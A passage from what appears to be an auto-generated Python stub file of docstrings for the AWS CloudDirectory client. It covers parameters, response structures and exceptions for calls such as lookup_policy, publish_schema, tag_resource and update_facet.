Validation rules that are attached to the attribute definition.
(string) --
(dict) --
Contains an Amazon Resource Name (ARN) and parameters that are associated with the rule.
Type (string) --
The type of attribute validation rule.
Parameters (dict) --
The minimum and maximum parameters that are associated with the rule.
(string) --
(string) --
RequiredBehavior (string) --
The required behavior of the TypedLinkAttributeDefinition .
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
:return: {
'Attributes': [
{
'Name': 'string',
'Type': 'STRING'|'BINARY'|'BOOLEAN'|'NUMBER'|'DATETIME'|'VARIANT',
'DefaultValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'IsImmutable': True|False,
'Rules': {
'string': {
'Type': 'BINARY_LENGTH'|'NUMBER_COMPARISON'|'STRING_FROM_SET'|'STRING_LENGTH',
'Parameters': {
'string': 'string'
}
}
},
'RequiredBehavior': 'REQUIRED_ALWAYS'|'NOT_REQUIRED'
},
],
'NextToken': 'string'
}
:returns:
(string) --
(string) --
"""
pass
def list_typed_link_facet_names(SchemaArn=None, NextToken=None, MaxResults=None):
"""
Returns a paginated list of TypedLink facet names for a particular schema. For more information, see Typed Links .
See also: AWS API Documentation
Exceptions
:example: response = client.list_typed_link_facet_names(
SchemaArn='string',
NextToken='string',
MaxResults=123
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of results to retrieve.
:rtype: dict
ReturnsResponse Syntax
{
'FacetNames': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
FacetNames (list) --
The names of typed link facets that exist within the schema.
(string) --
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
:return: {
'FacetNames': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def lookup_policy(DirectoryArn=None, ObjectReference=None, NextToken=None, MaxResults=None):
"""
Lists all policies from the root of the Directory to the object specified. If there are no policies present, an empty list is returned. If policies are present, and if some objects don\'t have the policies attached, it returns the ObjectIdentifier for such objects. If policies are present, it returns ObjectIdentifier , policyId , and policyType . Paths that don\'t lead to the root from the target object are ignored. For more information, see Policies .
See also: AWS API Documentation
Exceptions
:example: response = client.lookup_policy(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
},
NextToken='string',
MaxResults=123
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory . For more information, see arns .\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nReference that identifies the object whose policies will be looked up.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type NextToken: string
:param NextToken: The token to request the next page of results.
:type MaxResults: integer
:param MaxResults: The maximum number of items to be retrieved in a single call. This is an approximate number.
:rtype: dict
ReturnsResponse Syntax
{
'PolicyToPathList': [
{
'Path': 'string',
'Policies': [
{
'PolicyId': 'string',
'ObjectIdentifier': 'string',
'PolicyType': 'string'
},
]
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
PolicyToPathList (list) --
Provides list of path to policies. Policies contain PolicyId , ObjectIdentifier , and PolicyType . For more information, see Policies .
(dict) --
Used when a regular object exists in a Directory and you want to find all of the policies that are associated with that object and the parent to that object.
Path (string) --
The path that is referenced from the root.
Policies (list) --
List of policy objects.
(dict) --
Contains the PolicyType , PolicyId , and the ObjectIdentifier to which it is attached. For more information, see Policies .
PolicyId (string) --
The ID of PolicyAttachment .
ObjectIdentifier (string) --
The ObjectIdentifier that is associated with PolicyAttachment .
PolicyType (string) --
The type of policy that can be associated with PolicyAttachment .
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.ResourceNotFoundException
:return: {
'PolicyToPathList': [
{
'Path': 'string',
'Policies': [
{
'PolicyId': 'string',
'ObjectIdentifier': 'string',
'PolicyType': 'string'
},
]
},
],
'NextToken': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.ResourceNotFoundException
"""
pass
def publish_schema(DevelopmentSchemaArn=None, Version=None, MinorVersion=None, Name=None):
"""
Publishes a development schema with a major version and a recommended minor version.
See also: AWS API Documentation
Exceptions
:example: response = client.publish_schema(
DevelopmentSchemaArn='string',
Version='string',
MinorVersion='string',
Name='string'
)
:type DevelopmentSchemaArn: string
:param DevelopmentSchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the development schema. For more information, see arns .\n
:type Version: string
:param Version: [REQUIRED]\nThe major version under which the schema will be published. Schemas have both a major and minor version associated with them.\n
:type MinorVersion: string
:param MinorVersion: The minor version under which the schema will be published. This parameter is recommended. Schemas have both a major and minor version associated with them.
:type Name: string
:param Name: The new name under which the schema will be published. If this is not provided, the development schema is considered.
:rtype: dict
ReturnsResponse Syntax
{
'PublishedSchemaArn': 'string'
}
Response Structure
(dict) --
PublishedSchemaArn (string) --
The ARN that is associated with the published schema. For more information, see arns .
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.SchemaAlreadyPublishedException
:return: {
'PublishedSchemaArn': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.SchemaAlreadyPublishedException
"""
pass
def put_schema_from_json(SchemaArn=None, Document=None):
"""
Allows a schema to be updated using JSON upload. Only available for development schemas. See JSON Schema Format for more information.
See also: AWS API Documentation
Exceptions
:example: response = client.put_schema_from_json(
SchemaArn='string',
Document='string'
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe ARN of the schema to update.\n
:type Document: string
:param Document: [REQUIRED]\nThe replacement JSON schema.\n
:rtype: dict
ReturnsResponse Syntax
{
'Arn': 'string'
}
Response Structure
(dict) --
Arn (string) --
The ARN of the schema to update.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.InvalidSchemaDocException
CloudDirectory.Client.exceptions.InvalidRuleException
:return: {
'Arn': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.InvalidSchemaDocException
CloudDirectory.Client.exceptions.InvalidRuleException
"""
pass
def remove_facet_from_object(DirectoryArn=None, SchemaFacet=None, ObjectReference=None):
"""
Removes the specified facet from the specified object.
See also: AWS API Documentation
Exceptions
:example: response = client.remove_facet_from_object(
DirectoryArn='string',
SchemaFacet={
'SchemaArn': 'string',
'FacetName': 'string'
},
ObjectReference={
'Selector': 'string'
}
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe ARN of the directory in which the object resides.\n
:type SchemaFacet: dict
:param SchemaFacet: [REQUIRED]\nThe facet to remove. See SchemaFacet for details.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nA reference to the object to remove the facet from.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {}
:returns:
(dict) --
"""
pass
def tag_resource(ResourceArn=None, Tags=None):
"""
An API operation for adding tags to a resource.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_resource(
ResourceArn='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource. Tagging is only supported for directories.\n
:type Tags: list
:param Tags: [REQUIRED]\nA list of tag key-value pairs.\n\n(dict) --The tag structure that contains a tag key and value.\n\nKey (string) --The key that is associated with the tag.\n\nValue (string) --The value that is associated with the tag.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidTaggingRequestException
:return: {}
:returns:
(dict) --
"""
pass
def untag_resource(ResourceArn=None, TagKeys=None):
"""
An API operation for removing tags from a resource.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_resource(
ResourceArn='string',
TagKeys=[
'string',
]
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource. Tagging is only supported for directories.\n
:type TagKeys: list
:param TagKeys: [REQUIRED]\nKeys of the tag that need to be removed from the resource.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidTaggingRequestException
:return: {}
:returns:
(dict) --
"""
pass
def update_facet(SchemaArn=None, Name=None, AttributeUpdates=None, ObjectType=None):
"""
Does the following:
See also: AWS API Documentation
Exceptions
:example: response = client.update_facet(
SchemaArn='string',
Name='string',
AttributeUpdates=[
{
'Attribute': {
'Name': 'string',
'AttributeDefinition': {
'Type': 'STRING'|'BINARY'|'BOOLEAN'|'NUMBER'|'DATETIME'|'VARIANT',
'DefaultValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'IsImmutable': True|False,
'Rules': {
'string': {
'Type': 'BINARY_LENGTH'|'NUMBER_COMPARISON'|'STRING_FROM_SET'|'STRING_LENGTH',
'Parameters': {
'string': 'string'
}
}
}
},
'AttributeReference': {
'TargetFacetName': 'string',
'TargetAttributeName': 'string'
},
'RequiredBehavior': 'REQUIRED_ALWAYS'|'NOT_REQUIRED'
},
'Action': 'CREATE_OR_UPDATE'|'DELETE'
},
],
ObjectType='NODE'|'LEAF_NODE'|'POLICY'|'INDEX'
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Facet . For more information, see arns .\n
:type Name: string
:param Name: [REQUIRED]\nThe name of the facet.\n
:type AttributeUpdates: list
:param AttributeUpdates: List of attributes that need to be updated in a given schema Facet . Each attribute is followed by AttributeAction , which specifies the type of update operation to perform.\n\n(dict) --A structure that contains information used to update an attribute.\n\nAttribute (dict) --The attribute to update.\n\nName (string) -- [REQUIRED]The name of the facet attribute.\n\nAttributeDefinition (dict) --A facet attribute consists of either a definition or a reference. This structure contains the attribute definition. See Attribute References for more information.\n\nType (string) -- [REQUIRED]The type of the attribute.\n\nDefaultValue (dict) --The default value of the attribute (if configured).\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nIsImmutable (boolean) --Whether the attribute is mutable or not.\n\nRules (dict) --Validation rules attached to the attribute definition.\n\n(string) --\n(dict) --Contains an Amazon Resource Name (ARN) and parameters that are associated with the rule.\n\nType (string) --The type of attribute validation rule.\n\nParameters (dict) --The minimum and maximum parameters that are associated with the rule.\n\n(string) --\n(string) --\n\n\n\n\n\n\n\n\n\n\n\n\nAttributeReference (dict) --An attribute reference that is associated with the attribute. See Attribute References for more information.\n\nTargetFacetName (string) -- [REQUIRED]The target facet name that is associated with the facet reference. See Attribute References for more information.\n\nTargetAttributeName (string) -- [REQUIRED]The target attribute name that is associated with the facet reference. See Attribute References for more information.\n\n\n\nRequiredBehavior (string) --The required behavior of the FacetAttribute .\n\n\n\nAction (string) --The action to perform when updating the attribute.\n\n\n\n\n
:type ObjectType: string
:param ObjectType: The object type that is associated with the facet. See CreateFacetRequest$ObjectType for more details.
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.InvalidFacetUpdateException
CloudDirectory.Client.exceptions.FacetValidationException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetNotFoundException
CloudDirectory.Client.exceptions.InvalidRuleException
:return: {}
:returns:
SchemaArn (string) -- [REQUIRED]
The Amazon Resource Name (ARN) that is associated with the Facet . For more information, see arns .
Name (string) -- [REQUIRED]
The name of the facet.
AttributeUpdates (list) -- List of attributes that need to be updated in a given schema Facet . Each attribute is followed by AttributeAction , which specifies the type of update operation to perform.
(dict) --A structure that contains information used to update an attribute.
Attribute (dict) --The attribute to update.
Name (string) -- [REQUIRED]The name of the facet attribute.
AttributeDefinition (dict) --A facet attribute consists of either a definition or a reference. This structure contains the attribute definition. See Attribute References for more information.
Type (string) -- [REQUIRED]The type of the attribute.
DefaultValue (dict) --The default value of the attribute (if configured).
StringValue (string) --A string data value.
BinaryValue (bytes) --A binary data value.
BooleanValue (boolean) --A Boolean data value.
NumberValue (string) --A number data value.
DatetimeValue (datetime) --A date and time value.
IsImmutable (boolean) --Whether the attribute is mutable or not.
Rules (dict) --Validation rules attached to the attribute definition.
(string) --
(dict) --Contains an Amazon Resource Name (ARN) and parameters that are associated with the rule.
Type (string) --The type of attribute validation rule.
Parameters (dict) --The minimum and maximum parameters that are associated with the rule.
(string) --
(string) --
AttributeReference (dict) --An attribute reference that is associated with the attribute. See Attribute References for more information.
TargetFacetName (string) -- [REQUIRED]The target facet name that is associated with the facet reference. See Attribute References for more information.
TargetAttributeName (string) -- [REQUIRED]The target attribute name that is associated with the facet reference. See Attribute References for more information.
RequiredBehavior (string) --The required behavior of the FacetAttribute .
Action (string) --The action to perform when updating the attribute.
ObjectType (string) -- The object type that is associated with the facet. See CreateFacetRequest$ObjectType for more details.
"""
pass
def update_link_attributes(DirectoryArn=None, TypedLinkSpecifier=None, AttributeUpdates=None):
"""
Updates a given typed link\xe2\x80\x99s attributes. Attributes to be updated must not contribute to the typed link\xe2\x80\x99s identity, as defined by its IdentityAttributeOrder .
See also: AWS API Documentation
Exceptions
:example: response = client.update_link_attributes(
DirectoryArn='string',
TypedLinkSpecifier={
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
AttributeUpdates=[
{
'AttributeKey': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'AttributeAction': {
'AttributeActionType': 'CREATE_OR_UPDATE'|'DELETE',
'AttributeUpdateValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
]
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where the updated typed link resides. For more information, see arns or Typed Links .\n
:type TypedLinkSpecifier: dict
:param TypedLinkSpecifier: [REQUIRED]\nAllows a typed link specifier to be accepted as input.\n\nTypedLinkFacet (dict) -- [REQUIRED]Identifies the typed link facet that is associated with the typed link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nSourceObjectReference (dict) -- [REQUIRED]Identifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetObjectReference (dict) -- [REQUIRED]Identifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nIdentityAttributeValues (list) -- [REQUIRED]Identifies the attribute value to update.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n
:type AttributeUpdates: list
:param AttributeUpdates: [REQUIRED]\nThe attributes update structure.\n\n(dict) --Structure that contains attribute update information.\n\nAttributeKey (dict) --The key of the attribute being updated.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nAttributeAction (dict) --The action to perform as part of the attribute update.\n\nAttributeActionType (string) --A type that can be either UPDATE_OR_CREATE or DELETE .\n\nAttributeUpdateValue (dict) --The value that you want to update to.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {}
:returns:
(dict) --
"""
pass
def update_object_attributes(DirectoryArn=None, ObjectReference=None, AttributeUpdates=None):
"""
Updates a given object\'s attributes.
See also: AWS API Documentation
Exceptions
:example: response = client.update_object_attributes(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
},
AttributeUpdates=[
{
'ObjectAttributeKey': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'ObjectAttributeAction': {
'ObjectAttributeActionType': 'CREATE_OR_UPDATE'|'DELETE',
'ObjectAttributeUpdateValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
]
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where the object resides. For more information, see arns .\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nThe reference that identifies the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type AttributeUpdates: list
:param AttributeUpdates: [REQUIRED]\nThe attributes update structure.\n\n(dict) --Structure that contains attribute update information.\n\nObjectAttributeKey (dict) --The key of the attribute being updated.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nObjectAttributeAction (dict) --The action to perform as part of the attribute update.\n\nObjectAttributeActionType (string) --A type that can be either Update or Delete .\n\nObjectAttributeUpdateValue (dict) --The value that you want to update to.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'ObjectIdentifier': 'string'
}
Response Structure
(dict) --
ObjectIdentifier (string) --
The ObjectIdentifier of the updated object.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {
'ObjectIdentifier': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
CloudDirectory.Client.exceptions.FacetValidationException
"""
pass
def update_schema(SchemaArn=None, Name=None):
"""
Updates the schema name with a new name. Only development schema names can be updated.
See also: AWS API Documentation
Exceptions
:example: response = client.update_schema(
SchemaArn='string',
Name='string'
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the development schema. For more information, see arns .\n
:type Name: string
:param Name: [REQUIRED]\nThe name of the schema.\n
:rtype: dict
ReturnsResponse Syntax
{
'SchemaArn': 'string'
}
Response Structure
(dict) --
SchemaArn (string) --
The ARN that is associated with the updated schema. For more information, see arns .
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
:return: {
'SchemaArn': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
"""
pass
def update_typed_link_facet(SchemaArn=None, Name=None, AttributeUpdates=None, IdentityAttributeOrder=None):
"""
Updates a TypedLinkFacet . For more information, see Typed Links .
See also: AWS API Documentation
Exceptions
:example: response = client.update_typed_link_facet(
SchemaArn='string',
Name='string',
AttributeUpdates=[
{
'Attribute': {
'Name': 'string',
'Type': 'STRING'|'BINARY'|'BOOLEAN'|'NUMBER'|'DATETIME'|'VARIANT',
'DefaultValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'IsImmutable': True|False,
'Rules': {
'string': {
'Type': 'BINARY_LENGTH'|'NUMBER_COMPARISON'|'STRING_FROM_SET'|'STRING_LENGTH',
'Parameters': {
'string': 'string'
}
}
},
'RequiredBehavior': 'REQUIRED_ALWAYS'|'NOT_REQUIRED'
},
'Action': 'CREATE_OR_UPDATE'|'DELETE'
},
],
IdentityAttributeOrder=[
'string',
]
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n
:type Name: string
:param Name: [REQUIRED]\nThe unique name of the typed link facet.\n
:type AttributeUpdates: list
